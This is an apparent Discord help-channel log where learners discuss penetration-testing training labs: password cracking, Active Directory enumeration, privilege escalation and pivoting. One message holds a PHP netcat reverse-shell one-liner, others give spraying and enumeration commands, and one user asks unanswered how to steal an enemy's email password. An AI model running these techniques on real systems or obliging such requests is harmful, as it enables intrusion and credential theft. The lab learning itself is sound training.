#modules

1 messages ยท Page 217 of 1

fathom pendant
#

Reading comprehension is important

rustic sage
#

I'm at a loss to know how to tackle the module problem by cracking passwords with hashcat After decrypting the NTLM password hashes contained in the NTDS.dit file, perform an analysis of the results and discover the MOST common password in the INLANEFREIGHT. LOCAL

fathom pendant
#

Well, use the technique to obtain the passwords from that file, and then just see how many passwords are the same, hashcat has an output file mode

rustic sage
#

I have done it this way as such and it has deciphered me but now I have the problem of not knowing how to make it tell me which one is repeated
-->hashcat -a 0 -m 1000 hash12 /usr/share/wordlists/rockyou.txt --username hash12

#

you're missing the rules

fathom pendant
#

You'd need to analyze the output

rustic sage
#

hashcat rules are the most powerful feature of hashcat and will make your cracking time so much faster ๐Ÿ˜„

fathom pendant
brazen saffron
#

For ZAP Fuzzing with cookies, I have the select all the line?

rustic sage
#

And since I have the passwords now I need to know which one is repeated 5 times to get the answer

fathom pendant
brazen saffron
fathom pendant
quasi hawk
#

I've narrowed it down a bit. I'm either doing something wrong in my payload or my netcat listen command. I know have remote code execution because my 'id' prompt works but I cannot get the reverse shell to connect

wanton idol
#

i solved all the question but for one for the Windows Privilege Escalation Skills Assessment - Part I, im stuck at the first question Which two KBs are installed on the target system? (Answer format: 3210000&3210060). i cant seem to be able to find it a dm or hint on how to find it would be nice

fathom pendant
fathom pendant
wanton idol
#

ohhh thats what it meant... thank you so much

quasi hawk
fathom pendant
fathom pendant
#
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

This syntax yeah?

#

Also if you're adding a line of code you don't need another <?php

#

You just add the new command after the semicolon

quasi hawk
fathom pendant
#

I was just asking about syntax

#

You can replace the whole line with the ID command with that new php code

quasi hawk
crystal steeple
#

I think it the same error

#

i had this error before when i hadn't changed the key perms

#

or maybe just similar to it? im sure its was permission denied tho

fathom pendant
fathom pendant
quasi hawk
fathom pendant
#

because if you do it after, it's not gonna connect

fathom pendant
#

replace /bin/sh with /bin/bash

quasi hawk
barren bay
#

Hello, why my pwnbox is not accepting some of my keystrokes? I mean, everytime I tried to use the free terminal it doesn't let me write anything inside the terminal. Well some of my keystrokes are working, like: "n", "9", ":", "/". and the rest is not working๐Ÿ˜•

fathom pendant
fathom pendant
#

just use the full vm the integrated terminal is buggy

barren bay
#

ok, I'll try it tommorow. Thanks!!

fathom pendant
#

or alternatively: set up your own vm

quasi hawk
fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

could be a UFW setting in your vm

#

because if you can interact with the box you're at least connected to the vpn

raven prairie
#

Currently working through "Linux Fundementals", and I'm not sure if I missed something or if I'm mistaken but the questions listed under this section about Filter contents have nothing to do with what I've learned thus far and what was covered in the section? I looked up the answers and they had nothing to do with anything I've learned thus far?

split pelican
#

Anyone Know how i Get Email And Password from My Huge Enemy that Destroyed my Life?

fathom pendant
#

but they do relate to the commands listed in an earlier part of the module

misty saddle
#

I'm having tons of issues with the Attacking Common Services Skill Assessments. I get this error when trying to hydra. I cant crackmapexec. I've tried terminating the VPN multiple times, I've tried switching VPN. Any recommendations?

raven prairie
fathom pendant
#

no

#

curl is a fairly standard linux tool

crystal steeple
#

why do i get this error : (node:35281) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
[35281:0313/152417.303700:FATAL:gpu_data_manager_impl_private.cc(445)] GPU process isn't usable. Goodbye.
zsh: trace trap proxychains bloodhound

#

when i ran bloodhound with proxychains

misty saddle
next bronze
misty saddle
#

I can't even nmap

fathom pendant
misty saddle
fathom pendant
crystal steeple
next bronze
#

what?

#

the neo4j login page?

shut wraith
#

any tool for bruting a locked file on linux

misty saddle
crystal steeple
# next bronze the neo4j login page?

here's the thing i wanna use bh, i wanna ran bloodhound-python to get *.json using a domain user cred which his machine is not accessible to my network , so i gotta pivot right?

#

after getting the *.json files i should normally start neo4j and issue the command proxychains bloodhound after

next bronze
#

bloodhound-python is very different from bloodhound

#

bloodhound-python is a collector, bloodhound is the graphing tool

crystal steeple
#

yes

#

i just wanted to let you what i did

next bronze
#

there's no need to proxychains bloodhound, run it in your vm locally

crystal steeple
#

and what should i put as the database

#

that bolt://localhost:xxxx

next bronze
#

whatever your default credental is

#

it should be given in the module

solar zodiac
#

hi everyone ๐Ÿ™‚ I'm stuck on the skills assessment for the introduction to whitebox module. Is anyone willing for a nudge? I'd be forever in your favor ๐Ÿ™‚ I'm having some trouble with the authentication

crystal steeple
next bronze
#

again, bloodhound-python is very different from bloodhound
bloodhound-python is a collector, bloodhound is the graphing tool

#

bloodhound-python will need to connect to the DC to collect data

crystal steeple
#

wait

#

and its says invalid rn

cloud urchin
#

in simpler terms, bloodhound-python is a tool used to collect information from active directory, after that you take those files it's collected and put them into bloodhound which is an app that runs locally on your machine and shows you the results of that information collected.

crystal steeple
#

oh wait i may have confused things with the lab, all i need is the data collected by bloodhound-python that can be ran with proxychains to get data and then log to bloodhound with my own creds i set up?and upload it ?

cloud urchin
#

you don't need proxychains

#

you just collect the data with the python tool and then dump that data into bh

next bronze
#

depends on what you're doing you might need proxychains

crystal steeple
next bronze
#

if you don't have a direct route to DC

cloud urchin
#

yes, but he doesn't 'need' it

crystal steeple
#

i need proxychains in this case no?

cloud urchin
#

that's why i said just collect the data, if tha forces him to use proxychains to do that, that's fine

#

but one way or another he needs to get that data to his machine or the machine bh is running on

#

i don't know because i don't know the module, i'm just telling you what the tools do and how you use them together

next bronze
#

then you shouldn't say you don't need proxychains if you aren't sure

crystal steeple
cloud urchin
#

you may need to pivot through 318 machines before you get that data, i have no idea of the context

crystal steeple
#

if i can get the data i can ran bloodhound

cloud urchin
#

xre0us i'm just explaining those two tools. him not answering the specific method on how he needs to do it for his particular module.

#

so in the context of my answer, no proxychains is not required

#

if his particular engagement requires it, obviously he needs to use it then

fathom pendant
#

here's the thing: your answer can be construed as not needing it at all

#

that's the point that was being made

cloud urchin
#

right, he asked if he 'needed' proxychains to use it, i don't want him to think in the future he will require it every time

faint gulch
#

I am stuck for a long time in the AD Enumeration & Attacks module Skill assessment I on the last question. I have the creds for ||tpetty|| but I cant use them to RDP as this acc, or open a shell under its context with runas, for example (or runascs). Any nudge would be highly appreciated!

next bronze
#

you don't need to rdp

#

do it remotely or from a previous compromised host

sharp panther
#

sls

dusk jasper
#

I'm stucked for days in Broken Authentication - Predictable Reset Token Question 1, can anyone give me a nudge? I'm open to DMs.

I'm not sure if I'm doing something wrong with my milliseconds or my script, so anyone can look into it and give me advice?

next bronze
vital seal
#

Module: WINDOWS PRIVILEGE ESCALATION
Section: Pillaging
https://academy.hackthebox.com/module/67/section/1637

Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer

Restore a Backup with ID gives me nothing. C:\Restore\C\Windows\System32 folder is empty. What am I missing?

lean folio
#

almost everyone of us ๐Ÿ˜„

crystal steeple
#

CPTS 10000% , even if it long it will help you tremendously comparing to pnpt which cover only AD and and it is easy compared to CPTS, i did PJPT , im not deny that it was a fun experience as i was a complete beginner but CPTS is just goated

#

learning so much stuff deeply

#

lmao deleted msg as i was replying

wind plinth
#

sorry I realize I posted in the wrong spot

#

posted in CPTS channel

crystal steeple
#

hello im in the AD skills assessement II on the qst : Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

#

i thought of creating a list of all domain users and then start password spraying with weak cpasswords but im having problems on getting all domain users

#

there's 2000+ users , is there any way to get all those without losing much time or my approach wont work in this qst

next bronze
#

netexec can do it, the AD powershell module can do it

crystal steeple
next bronze
#

use nxc ldap will be a lot faster to get a userlist compared to the other protocols

crystal steeple
#

the domainpasswordspray.ps1 wont work

#

can't import it

crystal steeple
next bronze
#

from your attack host

#

nxc can both get a userlist and password spray

crystal steeple
#

same as kerbrute right?

dusk jasper
#

Does the date time provided by the module, in UTC? Or it follows the user's timezone?

next bronze
next bronze
crystal steeple
#

but whats the full syntax to generate userlist with nxc ldap ? domain user list

next bronze
#

nxc ldap <target> -u '' -p '' --users --log $(pwd)/users.out

#

you'll need to clean up the output to get a list you can pray with

cat users.out | python -c "import sys; [print(line.split()[9]) for line in sys.stdin if line.strip() and len(line.split()) > 9]" | tee users.txt
crystal steeple
#

but what is nxc? netexec?

next bronze
#

yes

dusk jasper
#

ngl that question is the only one left on my entire broken authentication module

next bronze
#

yeah seems to have tripped a lot of people up

gentle root
#

Might be missing something here but - Trying to use FFUF for "Brute Forcing Usernames - Broken Authentication" instead of using WFUZZ but I can figure out how to filter something like "Invalid Username" in ffuf. Idk if I'm having a stupid moment here - Anyone got a tip here?

marsh echo
#

hello i've done some forwarding to attack the mysql remote service using the csv file of all the default connection information. it's been 1h i'm brute force i'm on the right track or do i need to look somewhere else?

fathom pendant
#

as the cheat-sheet contains a lot of extraneous default creds

#

you can just manually search the cheat-sheet for mysql and use the small handful of creds to find it

#

it will be loads faster

fathom pendant
#

i was gonna help, but saw you're a weeb

#

so i changed my mind /s (I haven't done this module)

next bronze
fathom pendant
#

alternatively

#

hidden files

tranquil axle
#

Should be just -fr โ€žInvalid userโ€œ

vital seal
bleak jasper
#

Anyone do the "Password attacks lab - hard"? I'm struggling with the vhd file

gentle root
#

It's just returning all of them -

bleak jasper
#

Accessing it. I think I have it mounted. When I try "cryptsetup bitlkOpen" it requires a passphrase but doesn't work with the passwords I have. Tried to bitlock2john it to see if I can crack the password that way but john doesn't recognize it.

marsh echo
fathom pendant
fathom pendant
#

you put the output of bitlocker2john into it's own file

tranquil axle
bleak jasper
#

Just tried both but says no password hashes loaded

fathom pendant
#

you might need to run bitlocker2john with python2

#

otherwise i think it breaks

bleak jasper
#

Didn't get any errors but will try python2. Is it the whole vhd file or jsut the partition?

fathom pendant
#

the whole vhd

#

you don't run bitlocker2john on a partition

#

bitlocker2john requires a file input

bleak jasper
#

Was missing a -i flag this whole time ๐Ÿ’ข
Thanks for your help

marsh echo
#

thx a lot he works but it's strange because i use this there are shortly before and it didn't work

fathom pendant
hallow remnant
#

Module: BLIND SQL INJECTION
Section: Out-of-Band DNS

I've resolved this exercise using the internal custom DNS record as described in the module. However, I had some comprehension questions if anyone has any insight:

  1. Presumably, we cannot use Burp Suite Collaborator or the https://app.interactsh.com/#/ service because either would require external network connectivity and the instance cannot make DNS calls to the internet to perform the attack.

  2. The section lists towards the end of the Custom DNS record portion that, "As we are using a custom DNS domain and have access to the DNS server logs, we do not need to setup another listener like interact.sh to capture the logs (though it is still an option)"

I'm interested in understanding the point they're making in bullet #2. I'm assuming they're referring to pulling the Git repo for interact.sh and running that service. Has anyone been able to perform the exercise this way? Am I understanding this right?

cloud urchin
#

Just from what the statement says, it says you already have the logs so you don't need to setup a listener to obtain those logs, however if you didn't have access to the logs already setting up another listener is a way to obtain them.

#

as for using the tool, i haven't used it so not sure about how you configure it or the syntax

hallow remnant
#

Okay, I think I follow. The statement isn't referring to internal/external activity, but ability/inability to read logs.

#

That makes more sense when I read it.

cloud urchin
#

right it's saying you already have the logs so you don't need to setup the listener

gentle root
tranquil axle
#

derp

mellow delta
fathom pendant
#

You must first find a way onto the box: from there things can become clearer.
Step 0: enumerate

fathom pendant
#

Thats for you to figure out

mellow delta
#

ok

fathom pendant
#

Always enumerate your target first. Which is what this module is all about

mellow delta
#

yes, i ran nmap against it

fathom pendant
#

Then use the knowledge and tools from the module to help you move forward

mellow delta
#

trying

dim wolf
#

Two remain

#

the quality of these modules has vastly exceeded my expectations

#

i think the top 3 as of this point are Understanding Log Sources & Investigating with Splunk, Introduction to Malware Analysis, and Introduction to Digital Forensics

#

these three modules are organized neatly and have a vast wealth of information with lab exercises that make you really think outside the box

#

the skills assessments are done well, testing your newfound knowledge and analytical skills

#

i can't wait to see what Detecting Windows Attacks with Splunk will offer

crystal steeple
#

hello im on qst 7 of AD skills assesseent II : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

#

i got the creds from the config file and when i try to log in via mssclient.py it doesn't work for some reason

#

how can i use the spoiler tag on an image? i dont wanna spoil to show my command and the output of it

dim wolf
#

there's a little eye button on the image when you select to upload it

cloud urchin
#

you'll want to make sure you're inputting the user/pass correctly, so maybe don't copy/paste it. beyond that, if it's not working, it's very likely a red herring or creds for another service

#

you may need to enumerate more

#

one thing i've noticed in the modules is there are red herrings

crystal steeple
crystal steeple
dusk jasper
heavy edge
#

shells and payloads live engagement.

#

the parrot foothold box is not connected to the internet and has no webbrowser

#

so how do i upload payloads

#

and browse the sites? also i cant nmap because its not a su account

#

cant sudo either

cloud urchin
#

there are a myriad of different tools you can use to transfer files

#

scp, ftp, smb

heavy edge
#

but i cant uplooad files to the site

#

liek this hint

#

i cant access the blog because ** there is no webbrowser**

heavy edge
#

and i cant nmap because i cant run sudo

cloud urchin
#

so you're on computer a, and you want to transfer a file to computer b? or what?

dim wolf
#

you can access the web browser iirc

heavy edge
#

i have to remote into the foothold box. that ONLY has access to the 172.x.x.x network. outside pcs do not. im "supposed" to enumerate the ips and upload webshells etc. one is supposed to be a war file upload to get a shell. another ip is ablog im supposed to browse. but i cant becasue i cant nmap and i cant accessa browser

#

where lol when i look it up theonly one is tor and it wont connect

dim wolf
#

it's times like these where it's necessary to suffer

cloud urchin
#

you could do ssh tunneling

dim wolf
#

wow i've got a web browser on the foothold!

heavy edge
#

which one

dim wolf
#

firefox

heavy edge
#

wot i searched and it didnt come up

dim wolf
heavy edge
#

wtf

dim wolf
#

just type firefox in the terminal

crystal steeple
#

[-] ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

cloud urchin
#

sounds like you might be using the wrong authentication method, but idk because i have not done that module.

#

your error message indicates it's a problem with integrated authentication

crystal steeple
#

right?

#

nvm i used sqlsh and worked

cloud urchin
#

depends on how the sql server was setup

dusky fern
#

walkthroughs

latent fox
#

Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer.

#

I use nmap to scan and got the result Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: nix-nmap-easy | NetBIOS computer name: NIX-NMAP-EASY\\x00 | Domain name: \\x00 | FQDN: nix-nmap-easy |_ System time: 2023-06-25T13:16:13+02:00 Why the answer is Ubuntu instead of Window

dim wolf
#

that's why you see Windows there

#

some other telltale signs:
the OS that nmap detected (if it's a Windows machine, it's highly unlikely that there would be any mention of Linux)
the computer name (nix is short hard for Unix, signifying a Unix-based system)
the lack of a domain name (if not domain-joined, it would most likely say \\WORKGROUP)

normal panther
dim wolf
#

CDSA

normal panther
#

nice

limpid hemlock
#

Does anyone knw how to transfer the KeePass file to our pwn box in the password attacks hard section

normal panther
#

in my kali vm gobuster wasn't installed and tried to install it regularly had issues so opted to do update && upgrade only to realise my library blocks access to kali.org lol. Any workaround to this apart from using VPN?

latent fox
dim wolf
#

thinking of doing bug bounty hunter path after soc analyst

limpid hemlock
#

? Anyone any clue ?

jolly quartz
#

Do I have to get VMware pro to take a snapshot or is there another way?

normal panther
#

nibbles box is unstable AF? anybody experienced the same?

cloud urchin
jolly quartz
#

Sorry I meant more like a backup of my current OS configuration rather than a picture.

cloud urchin
#

looks like you do need pro for snapshots

dreamy yew
#

I am at Module: Password Attacks, Section: Attacking Active Directory & NTDS.dit. Has anyone encounter being unable to copy the NTDS.dit over to the attacker machine even after setting the SMB server on attakcer machine, and executing this command "cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit", using the Evil-winrm terminal line.

soft cedar
dreamy yew
#

You are referring to the C drive on the attacker machine right

soft cedar
#

yeah

dreamy yew
#

Yes I created a share called NTDS

cloud urchin
#

the command you wrote wouldn't transfer it to your attacker machine, looks like it's trying to copy it to the c: drive

soft cedar
dreamy yew
#

Oh now that I look at it, it just seems that I am just copying NTDS.dit from its original directory to C:\NTDS

#

I am trying to transfer the file over to attacker machine (linux)

cloud urchin
#

the easiest way i've found to transfer files from windows to your kali box is by using an smb server. use smbserver.py to create a smb share, then in your windows machine you can just navigate to the share folder and copy whatever you want to it

soft cedar
dreamy yew
#

Ok I understand what you guys mean now

cloud urchin
#

easier than that, you setup the smb server and you can just open it in explorer

#

but yeah that works too

dreamy yew
#

Xfreerdp is not available haha, so only through terminal

soft cedar
cloud urchin
#

ahh yeah

#

copy it is then

dreamy yew
#

Thanks @soft cedar @cloud urchin for the help

novel hinge
#

what should I be looking for when trying to find the domain of an SMB client? i've tried nmap, enum4linux, rpcclient. cant seem to find any information about the domain

cloud urchin
#

namp usually has it

novel hinge
cloud urchin
#

is there a website you can connect to and look around?

novel hinge
#

nope ;c

ember imp
novel hinge
cloud urchin
#

that's an smb enumeration script

ember imp
#

maybe try a diff one?

#

@novel hinge

soft cedar
#

crackmapexec smb <IP> : should find the domain name.

novel hinge
lethal latch
#

Is anyone able to help me out with the Advanced XSS filter bypass section? I'm able to bypass the filter successfully, but I can't seem to get an admin to view the exploit.

gusty kettle
#

"Secondarily, in this attack the attacker might be attempting to cloak their address with a decoy, but the responses for multiple closed ports will still be directed towards them with the RST flags denoted for TCP."

Arent the RST responses sent to both decoy ips and attackers ip , since responses are sent based on the source ip address of the requests. why the above line from htb stating that no matter what decoys attacker is using the responses are sent to the attackers ip ? Am i wrong ?

simple socket
#

Hello everybody thanks for the previous help you give me. Currently I am stuck in the section "Privileged Access" in the "Active directory enumeration & attacks" on the exercice nยฐ3 "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." I used xfreerdp to connect and after used the tool "Get-SQLQuery" and it's work but I would like to execute the script "mssqlclient.py " but the windows machine don't contains python installed and from my kali I cannot access directly to the ip address of the SQL machine (10.129.230.228) do you think I need to used "chisel" or other kind of tools ? Thanks

novel hinge
ember imp
soft cedar
#

What are you trying to do?
Is it a module / box?

soft cedar
novel hinge
#

but i ran enum4linux and it worked i think i was just tireed and overlooked it

#

thank you guys for your help so much, iddk why that took me so long

#

ty human god and 0x5

cloud urchin
simple socket
simple socket
soft cedar
simple socket
soft cedar
simple socket
ember imp
#

repost from #858470491676737536 :
henlo pals. i hope this is the right channel for this. can someone fill me in on what the issue is here? i figure its a vpn issue, but not completely certain. this happened on Module: Network Enumeration with nmap , Section: Firewall and IDS/IPS Evasion - Medium Lab i spent like 6-8 hours banging my head against this simple exercise only to discover this was the problem. it is also affecting me now on the Hard Lab as well. i get two completely different scan results from the same target depending on the machine i am using. i am worried this will affect all of my Labs in the future. seems like a big-ish deal to me. any advice is appreciated.

autumn pilot
#

Raise it to support and please mask the command

ember imp
cunning frigate
#

I'm working on the skill assessment for the Windows Attack and Defense module. I have completed the attack but I can't find any logs under the Id 4886 or 4887

lyric girder
#

Just use mimikatz. I moved mimikatz to target machine and got the answer

cunning frigate
sinful olive
#

Can anyone please help me here? It is the last module for me...
in Attacking Enterprise Networks - Post Exploitation Im trying to double pivot using ligolo-ng. It works fine, but when I ping - 172.16.9.3 for example - no answer...
Also when I tried to add a new route: sudo ip route add 172.16.9.0/23 dev ligolo2 - I get error that Error: Invalid prefix for given prefix length.. So I added /24 instead but that probably not right...

fathom pendant
#

for routing you add the route host (in this instance 172.16.0.0)

dreamy solar
#

Hello how to capture login password with Wireshark ? plz

sinful olive
fathom pendant
#

in ligolo you also do need to connect to the session (aka start) that has the appropriate routing

sinful olive
fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

i'm sure someone with more knowledge than me can answer it

#

but bear in mind many people do the module blind

sinful olive
fathom pendant
#

i haven't done that module to be able to tell you

#

idk if that network is segregated instead into /8 or what have you so the host bits are 172.16.8 and 172.16.9

sinful olive
fathom pendant
#

also that ip is the other interface on that device

sinful olive
# fathom pendant separate interfaces btw

Yea.. I want to access 172.16.9.25. Now I can only access 172.16.8... but not 172.16.9.. even though I added double pivoting and I can see that the interfaces changed to that second machine...

fathom pendant
#

add another route specifying 172.16.9.0/8 or /16

#

see if that reesolves

sinful olive
dreamy yew
#

Module: Password Attacks, Section: Credential Hunting in Windows, does anybody has issue transferring over Lazagne from attacker to target, and after transferrring Lazagne to target, has trouble executing the lazagne.py file because target does not have pip or python.

cloud urchin
fathom pendant
#

there's a LaZagne.exe

dreamy yew
#

yup managed to solve it

native turtle
#

Any hint on broken auth skills assessment? I found all support account and their password, also decoded and understood how cookies work but cannot obtain privileged account... Now Im trying to find any admin* account via message.php. I got an hint from the register form it say invalid prefix when I try to create a user with name admin*, am I on the right path?

#

I GOT IT

#

๐Ÿฅณ

gusty kettle
#

Guys need some help with this question from Skill Assessment "INTERMEDIATE NETWORK TRAFFIC ANALYSIS"

Inspect the funky_dns.pcap file, part of this module's resources, and enter the related attack as your answer. Answer format: "DNS Flooding", "DNS Amplification", "DNS Tunneling"

My answers: "DNS Tunneling", "DNS Enumeration"

What am i missing ?

dim wolf
#

also, DNS Enumeration isn't an option.

gusty kettle
#

Oh I thought they were given as examples

#

Thanks

crystal steeple
#

need help on AD SKILLS ASSESSEMENT II : Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

#

got a revshell but can PE

#

can't

#

there were that seImpersonate enabled but its was not covered in the module till windows PE

#

so i probably should try smth else but im stuck

next bronze
#

why not try it

dim wolf
#

you can find different ways to the flag

crystal steeple
#

but everything failed, used printspoofer but a cmd of admin popped up and then i get back to my ps session with low privilege

#

also tried juicypotato which resulted in an error while execution

next bronze
#

juicypotato will work, try different CLID

crystal steeple
#

the command is ||.\JuicyPotato.exe -cmd "C:\Users\Public\nc.exe -e cmd.exe 172.16.7.240 4040"|| right?

next bronze
crystal steeple
#

wait what's that , i just followed a medium blog about SEimpersonate since i was frustrated but none of them talked about clid

#

when using juicypotato

#

how do you specify clid?

next bronze
#

read the docs 4Head

crystal steeple
#

this part is suck , why would they put something wasn't covered before

next bronze
crystal steeple
fathom pendant
patent oak
crystal steeple
#

just got the revshell and struggling to get system lvl

crystal steeple
#

it wasnt technically covered , its more like a what you can do , and you'll be able to do one you reach windows pe

limpid hemlock
#

I'm currently the password attacks lab hard I wana transfer a keypass file from a windows machine onto my pwn box I try to setup an smb share and transfer it didn't work any clues ??

upbeat oak
#

do some of these labs work better on parrot os vs kali? Has anyone noticed a difference?

next bronze
#

what's the error

crystal steeple
#

nvm

#

i used printspoofer with ncat

#

and go the system shell

crystal steeple
upbeat oak
#

What are some other options to use in a nmap scan other than -Pn to get past host seems down. I've tried decreasing the speed and use random ip addresses however I still get a host seems down message. I don't seem to get the full out put when I use -Pn so I try to avoid using it. Could it be because I'm running a vpn in the background there's a connection issue or something?

#

even -T3 -D RND:5 --source-port 53 won't allow me to scan the ipaddress

bleak jasper
#

are you able to ping the host? Or get other responses from the host?

fathom pendant
fringe urchin
#

just did footprinting medium lab! is my fav till now PepeWork time to go for hard

fringe urchin
upbeat oak
#

Yeah that's why I try to avoid the -Pn option but I'm not getting a response otherwise

fathom pendant
#

You're gonna use a multitude of techniques, RND was never needed for me

upbeat oak
#

--disable-arp-ping hasn't worked either unfortunately. I've been getting away with just using -T4 but this lab isn't letting me do that this time

#

should I just regen the target?

rustic sage
#

Any one knows how to use XXEinjector tool

fringe urchin
upbeat oak
fathom pendant
#

Try resetting the box and trying again

#

If you got blocked, then you're gonna be getting nothing

#

Regardless if your command is right or not

fringe urchin
#

^

upbeat oak
#

okay

fathom pendant
#

And the timer is like 5-10 minutes iirc

#

Idk i never tripped it on accident

fringe urchin
#

just reset the target, its faster peepoteef

ember coral
#

whats the best way to scan these boxes? my nmaps going slow AF on HTB machines i've been dealing with it for most part but really want a detailed scan for skill assessments and its like 1% a minute

patent oak
#

I have a payload ready to go just need that shell to work

fathom pendant
ember coral
fathom pendant
#

add -sT

#

which forces it to do a TCP scan instead of something like a Syn Scan

crystal steeple
#

or just a blog online

#

if you set up printspoofer with netcat you should be able to get a good system rev shell

patent oak
unborn pilot
#

I have a issue with white box testing, an error said "code injection should not be possible, even without sanitization or validation", but the only time i use the inputs its is here ```js
console.log(type,"password - length",length,':', password);

crystal steeple
#

its short and easy

crystal steeple
unborn pilot
cedar yew
dark star
#

can anyone help me on BROKEN AUTHENTICATION Predictable Reset Token, question 2 was easy but i cant figure out question 1

patent oak
fathom pendant
patent oak
#

Maybe I got some dodgy binaries

fathom pendant
#

there's ways to find the version of something, usually -V or -v

cedar yew
#

I used a few nodules but it didn't work.

patent oak
crystal steeple
#

the lab brokes btw

#

its broke 3 times for me so maybe its broken

fathom pendant
patent oak
#

I wonder if its cause I downloaded nc64.exe instead of looking on the machine for an exe

#

Will have a look

#

And... My own box died

crystal steeple
#

i need help to get to DC01
i have the genericALL right
i tried to use it to get the dc01 admin but i dont know how
i tried to change the admin password but it changed the admin of ms01 not dc01

#

'submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host."

#

idk what im doing wrong

unborn pilot
#

thx for your feedback, i had the same issue with the fact that it shouldn't crash which is weird, A hint tells you to throw and error when condition are not met. anw thx

ember coral
patent oak
fathom pendant
crystal steeple
crystal steeple
#

this module was sooooo fun ngl but the skills assessment made me lose time over stupid thing such as getting rev shells,googling,transfering files

#

gosh i love htb, i learned a lot

patent oak
ember coral
fathom pendant
#

try doing it from the pwnbox (turning off your vpn first) and see if the issue persists

next bronze
#

it happens when the target just spawned, give it a few mins to stablise

fathom pendant
#

vpn-region would be (Us/EU)-academy-(1/2/3)

ember coral
fathom pendant
#

the US EAST/US WEST/etc.. are pwnbox regions which are completely separate

limpid hemlock
#

I have a doubt anyone knw how to transfer a keypass file onto our pwn box I tried using a share but it didn't work in the password attacks hard lab

fathom pendant
#

@ember coral I take it this image reflects what you're meaning by "my ms shows as 50 ms"

fathom pendant
ember coral
fathom pendant
#

you were likely seeing the pwnbox connection speed

#

which is what my screenshot is displaying for me

#

the vpn speeds don't have a connection time visible

ember coral
#

ah yeah your right i see it now on pawn box. I perfer not to use the box but i cn do my scans there and work from machine if needed i guess.

fathom pendant
fickle moss
#

hey y can't i txt in general l

fathom pendant
#

Because you need to follow the instructions in #welcome

grand zinc
#

This might only be me but i read the modules but the questions seems like it has nothing to do with them. Rn im doing filter contents and i dont understand a single question what it wants me to do.

#

i look up what i have to do on google but i need root perms to access all the ipv4 services but seems i cant get root access when on target

grand zinc
#

when im on my vm ssh to target i cant get sudo to work

fathom pendant
#

Wdym can't get sudo to work

#

sudo command then input the user pw if prompted

grand zinc
#

sudo netstat -tunleep | grep -v "127.0.0" | wc -l
htb-student is not in the sudoers file. This incident will be reported
0

upbeat oak
#

Hmmm so I switched to my parrot os vm and running locate gives me a command not found error is that normal?

#

I know how to fix it just wondering if thats normal

#

also mssqlclient.py seems to not be on there but I'm sure it's on my kali machine

fathom pendant
fathom pendant
upbeat oak
fathom pendant
#

It does

upbeat oak
#

I checked there and it wasn't in there

#

ill show it

fathom pendant
#

It'll be under impacket

#

I can assuredly say it's there bc it's on mine ยฏ_(ใƒ„)_/ยฏ

upbeat oak
#

Well shit I found it lol my bad, I ran locate and it didn't show it

fathom pendant
#

Locate can be dumb

upbeat oak
#

worked on my kali machine interestingly enough

fathom pendant
#

But if it autocompletes, it exists is my general rule of thumb

upbeat oak
#

I'll give parrot another try lol I gave up to easy

rustic sage
#

why cant i access general

#

like chat

#

how can i access general

#

like chat

#

.

#

when can i acces general?

#

like chat??????

analog dock
#

No need to spam

rustic sage
#

hi

#

@analog dock how can i access general?

analog dock
#

Read the damn channel

ashen umbra
#

I am in attacking common services: DNS. I have ||enumerated the subdomains using subbrute and have found a flag in the TXT records of one of inlanefreight.com. It is not working. I am assuming it is a leftover flag from another exercise? Where does it want me to go get these flags? Maybe Dig is not the right tool for the job on this one.||

Please help

upbeat oak
# rustic sage hi

Go to the welcome channel and put in your htb credentials in the bot command channel

fathom pendant
upbeat oak
#

Mb what MarcieLee said

rare atlas
#

Ooi

fringe urchin
#

Done with Footprinting module PepeWork , SSH was hella slow pepeSadge

fathom pendant
ashen umbra
#

I knew it

fathom pendant
#

Wrong site entirely

upbeat oak
rare atlas
#

Tonde gemar join discord

fringe urchin
ashen umbra
#

I always spend all the time on the module and dont read the question well lol

rare atlas
#

Help me

fathom pendant
ashen umbra
#

Thanks

upbeat oak
#

I've got 2 more to do then then the 3 labs at the end

fringe urchin
fringe urchin
upbeat oak
fringe urchin
#

dont attack ssh service KEKW

upbeat oak
#

Okay bet kek

grand zinc
remote latch
#

i cant access the website in windows on htb academy

#

is this like only possible with VM

#

cuz kali and C# are uh uh so its best to do it in windows

grand zinc
#

cant find the solutions to these questions. I have read everything but cant find anything that has to do with this

ashen umbra
# fathom pendant Because you're meant to go after inlanefreight.htb

when I run any DNS enum tools or commands on inlanefreight.htb I do not see a nameserver. if i use the ns1.inlanefreight.com one, I can actively subbrute, but not for inlanefreight.htb. there is no nameserver that I can find for inlanefreight.htb.

||โ””โ”€โ”€โ•ผ [โ˜…]$ cat resolvers.txt
ns1.inlanefreight.com
โ”Œโ”€[us-academy-1]โ”€[10.10.15.203]โ”€[htb-ac-30427@htb-mota8xpkb2]โ”€[~/Desktop/subbrute]
โ””โ”€โ”€โ•ผ [โ˜…]$ ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
||

acoustic owl
ashen umbra
#

in the resolvers.txt?

#

yup

upbeat oak
#

hey i'm trying to instal the odat.py using the provided script but I'm getting an externally managed environment error during the installation

dreamy solar
#

Hello how to send my cookies windows on my machines linux

ashen umbra
# acoustic owl Use the target IP as DNS server

